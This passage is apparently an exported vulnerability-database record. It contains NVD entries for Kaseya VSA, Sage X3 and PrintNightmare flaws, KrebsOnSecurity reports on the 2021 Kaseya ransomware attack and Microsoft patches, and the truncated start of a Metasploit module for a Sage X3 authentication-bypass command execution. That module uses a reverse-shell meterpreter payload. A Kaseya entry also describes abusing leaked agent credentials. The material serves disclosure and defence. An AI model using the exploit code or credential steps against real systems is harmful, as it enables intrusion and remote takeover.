"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30118"], "modified": "2022-04-29T18:59:00", "cpe": [], "id": "CVE-2021-30118", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30118", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-12-03T15:10:20", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp. When an attacker downloads a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword. This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9). This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients.
Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30116", "cwe": ["CWE-522"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2023-10-23T14:15:00", "cpe": [], "id": "CVE-2021-30116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-03T16:25:24", "description": "Sage X3 System CHAINE Variable Script Command Injection. An authenticated user with developer access can pass OS commands via this variable used by the web application. 
Note, this developer configuration should not be deployed in production.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T19:15:00", "type": "cve", "title": "CVE-2020-7389", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7389"], "modified": "2022-07-15T17:51:00", "cpe": [], "id": "CVE-2020-7389", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7389", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-12-03T14:41:41", "description": "Directory traversal vulnerability in Kaseya Virtual System Administrator (VSA) 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 allows remote authenticated users to read arbitrary files via a crafted HTTP request.", "cvss3": {}, "published": "2015-07-20T23:59:00", "type": "cve", "title": "CVE-2015-2862", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2862"], "modified": "2019-02-05T19:25:00", "cpe": [], "id": "CVE-2015-2862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2862", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-12-03T15:30:01", "description": "Windows Print Spooler Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T22:15:00", "type": "cve", "title": "CVE-2021-34527", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-07-02T21:08:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:21h1", 
"cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2021-34527", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34527", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "krebs": [{"lastseen": "2021-07-28T14:33:34", "description": "\n\nLast week cybercriminals deployed ransomware to 1,500 organizations, including many that provide IT security and technical support to other companies. 
The attackers exploited a vulnerability in software from **Kaseya**, a Miami-based company whose products help system administrators manage large networks remotely. Now it appears Kaseya's customer service portal was left vulnerable until last week to a data-leaking security flaw that was first identified in the same software six years ago.\n\nOn July 3, the [REvil ransomware affiliate program](<https://krebsonsecurity.com/?s=revil>) began using a zero-day security hole ([CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>)) to deploy ransomware to hundreds of IT management companies running Kaseya's remote management software -- known as the **Kaseya Virtual System Administrator** (VSA).\n\nAccording to [this entry for CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>), the security flaw that powers that Kaseya VSA zero-day was assigned a vulnerability number on April 2, 2021, indicating Kaseya [had roughly three months to address the bug before it was exploited in the wild](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>).\n\nAlso on July 3, security incident response firm **Mandiant** notified Kaseya that their billing and customer support site --**portal.kaseya.net** -- was vulnerable to [CVE-2015-2862](<https://nvd.nist.gov/vuln/detail/CVE-2015-2862>), a "directory traversal" vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser.\n\nAs its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya's customer portal was still exposed to the data-leaking weakness.\n\n\n\nThe Kaseya customer support and billing portal. Image: Archive.org.\n\nMandiant notified Kaseya after hearing about it from **Alex Holden**, founder and chief technology officer of Milwaukee-based cyber intelligence firm [Hold Security](<https://www.holdsecurity.com>). 
Holden said the 2015 vulnerability was present on Kaseya's customer portal until Saturday afternoon, allowing him to download the site's ["web.config" file](<https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/webconfig-file-detected/>), a server component that often contains sensitive information such as usernames and passwords and the locations of key databases.\n\n"It's not like they forgot to patch something that Microsoft fixed years ago," Holden said. "It's a patch for their own software. And it's not zero-day. It's from 2015!"\n\nThe official description of CVE-2015-2862 says a would-be attacker would need to be already authenticated to the server for the exploit to work. But Holden said that was not the case with the vulnerability on the Kaseya portal that he reported via Mandiant.\n\n"This is worse because the CVE calls for an authenticated user," Holden said. "This was not."\n\n**Michael Sanders**, executive vice president of account management at Kaseya, confirmed that the customer portal was taken offline in response to a vulnerability report. Sanders said the portal had been retired in 2018 in favor of a more modern customer support and ticketing system, yet somehow the old site was still left available online.\n\n"It was deprecated but left up," Sanders said.\n\nIn a written statement shared with KrebsOnSecurity, Kaseya said that in 2015 CERT reported two vulnerabilities in its VSA product.\n\n"We worked with CERT on responsible disclosure and released patches for VSA versions V7, R8, R9 and R9 along with the public disclosure (CVEs) and notifications to our customers. Portal.kaseya.net was not considered by our team to be part of the VSA shipping product and was not part of the VSA product patch in 2015. 
It has no access to customer endpoints and has been shut down - and will no longer be enabled or used by Kaseya."\n\n"At this time, there is no evidence this portal was involved in the VSA product security incident," the statement continued. "We are continuing to do forensic analysis on the system and investigating what data is actually there."\n\nThe REvil ransomware group said affected organizations could negotiate independently with them for a decryption key, or someone could pay $70 million worth of virtual currency to buy a key that works to decrypt all systems compromised in this attack.\n\nBut Sanders said every ransomware expert Kaseya consulted so far has advised against negotiating for one ransom to unlock all victims.\n\n"The problem is that they don't have our data, they have our customers' data," Sanders said. "We've been counseled not to do that by every ransomware negotiating company we've dealt with. They said with the amount of individual machines hacked and ransomwared, it would be very difficult for all of these systems to be remediated at once."\n\nIn a video posted to YouTube on July 6, Kaseya CEO **Fred Voccola** said the ransomware attack had "limited impact, with only approximately 50 of the more than 35,000 Kaseya customers being breached."\n\n"While each and every customer impacted is one too many, the impact of this highly sophisticated attack has proven to be, thankfully, greatly overstated," Voccola said.\n\nThe zero-day vulnerability that led to Kaseya customers (and customers of those customers) getting ransomed was discovered and reported to Kaseya by [Wietse Boonstra](<https://twitter.com/wietsman>), a researcher with the **Dutch Institute for Vulnerability Disclosure** (DIVD). 
\n\nIn [a July 4 blog post](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>), DIVD's **Victor Gevers** wrote that Kaseya was "very cooperative," and "asked the right questions."\n\n"Also, partial patches were shared with us to validate their effectiveness," Gevers wrote. "During the entire process, Kaseya has shown that they were willing to put in the maximum effort and initiative into this case both to get this issue fixed and their customers patched. They showed a genuine commitment to do the right thing. Unfortunately, we were beaten by REvil in the final sprint, as they could exploit the vulnerabilities before customers could even patch."\n\nStill, Kaseya has yet to issue an official patch for the flaw Boonstra reported in April. Kaseya [told customers on July 7](<https://venturebeat.com/2021/07/07/kaseya-patch-fixing-zero-day-attack-delayed-as-issues-hit-saas-rollout/>) that it was working "through the night" to push out an update.\n\nGevers said the Kaseya vulnerability was discovered as part of a larger DIVD effort to look for serious flaws in a wide array of remote network management tools. 
\n\n"We are focusing on these types of products because we spotted a trend where more and more of the products that are used to keep networks safe and secure are showing structural weaknesses," he wrote.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T15:22:58", "type": "krebs", "title": "Kaseya Left Customer Portal Vulnerable to 2015 Flaw in its Own Software", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2862", "CVE-2021-30116"], "modified": "2021-07-08T15:22:58", "id": "KREBS:6C9A4C86453CF1F4DA06688B3CC1E186", "href": "https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:35", "description": "**Microsoft** on Tuesday issued an emergency software update to quash a security bug that's been dubbed "**PrintNightmare**," a critical vulnerability in all supported versions of **Windows** that is actively being exploited. 
The fix comes a week ahead of Microsoft's normal monthly Patch Tuesday release, and follows the publishing of exploit code showing would-be attackers how to leverage the flaw to break into Windows computers.\n\nAt issue is [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), which involves a flaw in the Windows Print Spooler service that could be exploited by attackers to run code of their choice on a target's system. Microsoft says it has already detected active exploitation of the vulnerability.\n\n**Satnam Narang**, staff research engineer at **Tenable**, said Microsoft's patch warrants urgent attention because of the vulnerability's ubiquity across organizations and the prospect that attackers could exploit this flaw in order to take over a Windows domain controller.\n\n"We expect it will only be a matter of time before it is more broadly incorporated into attacker toolkits," Narang said. "PrintNightmare will remain a valuable exploit for cybercriminals as long as there are unpatched systems out there, and as we know, unpatched vulnerabilities have a long shelf life for attackers."\n\nIn [a blog post](<https://msrc-blog.microsoft.com/2021/07/06/out-of-band-oob-security-update-available-for-cve-2021-34527/>), Microsoft's Security Response Center said it was delayed in developing fixes for the vulnerability in **Windows Server 2016**, **Windows 10 version 1607**, and **Windows Server 2012**. 
The fix also apparently includes a new feature that allows Windows administrators to implement stronger restrictions on the installation of printer software.\n\n"Prior to installing the July 6, 2021, and newer Windows Updates containing protections for CVE-2021-34527, the printer operators’ security group could install both signed and unsigned printer drivers on a printer server," reads Microsoft's [support advisory](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>). "After installing such updates, delegated admin groups like printer operators can only install signed printer drivers. Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.”\n\nWindows 10 users can check for the patch by opening Windows Update. Chances are, it will show what's pictured in the screenshot below -- that **KB5004945** is available for download and install. A reboot will be required after installation.\n\nFriendly reminder: It's always a good idea to back up your data before applying security updates. Windows 10 [has some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. \n\nMicrosoft's out-of-band update may not completely fix the PrintNightmare vulnerability. 
Security researcher [Benjamin Delpy](<https://blog.gentilkiwi.com/>) [posted on Twitter](<https://twitter.com/gentilkiwi/status/1412771368534528001>) that the exploit still works on a fully patched Windows server if the server also has Point & Print enabled -- a Windows feature that automatically downloads and installs available printer drivers.\n\nDelpy said it's common for organizations to enable Point & Print using group policies because it allows users to install printer updates without getting approval first from IT. \n\nThis post will be updated if Windows users start reporting any issues in applying the patch.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:34:59", "type": "krebs", "title": "Microsoft Issues Emergency Patch for Windows Flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T14:34:59", "id": "KREBS:3CC49021549439F95A2EDEB2029CF54E", "href": "https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": 
"2021-07-28T14:33:34", "description": "\n\n**Microsoft** today released updates to patch at least 116 security holes in its **Windows** operating systems and related software. At least four of the vulnerabilities addressed today are under active attack, according to Microsoft.\n\nThirteen of the security bugs quashed in this month's release earned Microsoft's most-dire "critical" rating, meaning they can be exploited by malware or miscreants to seize remote control over a vulnerable system without any help from users.\n\nAnother 103 of the security holes patched this month were flagged as "important," which Microsoft assigns to vulnerabilities "whose exploitation could result in compromise of the confidentiality, integrity, or availability of user data, or of the integrity or availability of processing resources."\n\nAmong the critical bugs is of course the official fix for the **PrintNightmare** print spooler flaw in most versions of Windows ([CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)) that prompted Microsoft [to rush out a patch for a week ago](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>) in response to exploit code for the flaw that got accidentally published online. That patch seems to have caused a number of problems for Windows users. Here's hoping the updated fix resolves some of those issues for readers who've been holding out.\n\n[CVE-2021-34448](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34448>) is a critical remote code execution vulnerability in the scripting engine built into every supported version of Windows -- including server versions. 
Microsoft says this flaw is being exploited in the wild.\n\nBoth [CVE-2021-33771](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33771>) and [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31979>) are elevation of privilege flaws in the Windows kernel. Both are seeing active exploitation, according to Microsoft.\n\n**Chad McNaughton**, technical community manager at **Automox**, called attention to [CVE-2021-34458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34458>), a remote code execution flaw in the deepest areas of the operating system. McNaughton said this vulnerability is likely to be exploited because it is a "low-complexity vulnerability requiring low privileges and no user interaction."\n\nAnother concerning critical vulnerability in the July batch is [CVE-2021-34494](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34494>), a dangerous bug in the Windows DNS Server.\n\n"Both core and full installations are affected back to Windows Server 2008, including versions 2004 and 20H2," said **Aleks Haugom**, also with Automox.\n\n"DNS is used to translate IP addresses to more human-friendly names, so you don’t have to remember the jumble of numbers that represents your favorite social media site," Haugom said. "In a Windows Domain environment, Windows DNS Server is critical to business operations and often installed on the domain controller. This vulnerability could be particularly dangerous if not patched promptly."\n\nMicrosoft also patched six vulnerabilities in **Exchange Server**, an email product that has been under siege all year from attackers. 
**Satnam Narang**, staff research engineer at **Tenable**, noted that while Microsoft says two of the Exchange bugs tackled this month ([CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>)) were addressed as part of its security updates from April 2021, both CVEs were somehow omitted from that April release. Translation: If you already applied the bevy of Exchange updates Microsoft made available in April, your Exchange systems have protection against these flaws.\n\nOther products that got patches today include **Microsoft Office**, **Bing**, **SharePoint Server**, **Internet Explorer**, and **Visual Studio**. The **SANS Internet Storm Center** as always has [a nice visual breakdown of all the patches by severity](<https://isc.sans.org/forums/diary/Microsoft+July+2021+Patch+Tuesday/27628/>).\n\n**Adobe** also [issued security updates today](<https://helpx.adobe.com/security.html>) for **Adobe Acrobat** and **Reader**, as well as **Dimension**, **Illustrator**, **Framemaker** and **Adobe Bridge**.\n\n**Chrome** and **Firefox** also recently have shipped important security updates, so if you haven't done so recently, take a moment to save your tabs/work, completely close out and restart the browser, which should apply any pending updates.\n\nThe usual disclaimer:\n\nBefore you update with this month’s patch batch, please make sure you have backed up your system and/or important files. It’s not uncommon for Windows updates to hose one’s system or prevent it from booting properly, and some updates even have been known to erase or corrupt files.\n\nSo do yourself a favor and back up _before_ installing any patches. 
Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, check out [AskWoody](<https://www.askwoody.com/>), which keeps a close eye out for specific patches that may be causing problems for users.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T21:41:47", "type": "krebs", "title": "Microsoft Patch Tuesday, July 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34494", "CVE-2021-34473", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34523", "CVE-2021-34458", "CVE-2021-34527", "CVE-2021-31979"], "modified": "2021-07-13T21:41:47", "id": "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "href": "https://krebsonsecurity.com/2021/07/microsoft-patch-tuesday-july-2021-edition/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-21T01:09:48", "description": "This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an available AdxAdmin service.\n", "cvss3": {}, "published": "2021-07-21T01:07:08", "type": "metasploit", "title": "Sage X3 Administration Service Authentication Bypass Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-WINDOWS-SAGE-X3_ADXSRV_AUTH_BYPASS_CMD_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',\n 'Description' => %q{\n This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.\n },\n 'Author' => [\n 'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk\n 'Aaron Herndon' # @ac3lives\n 
],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2021-07-07',\n 'References' => [\n ['CVE', '2020-7387'], # Infoleak\n ['CVE', '2020-7388'], # RCE\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ],\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'CMD' => 'whoami'\n }\n }\n ],\n [\n 'Windows DLL',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Executable',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(1818)\n ]\n )\n end\n\n def vprint(msg = '')\n print(msg) if datastore['VERBOSE']\n end\n\n def check\n s = connect\n print_status('Connected')\n\n # ADXDIR command authentication header\n # allows for unauthenticated retrieval of X3 directory\n auth_packet = \"\\x09\\x00\"\n s.write(auth_packet)\n\n # recv response\n res = s.read(1024)\n\n if res.nil? 
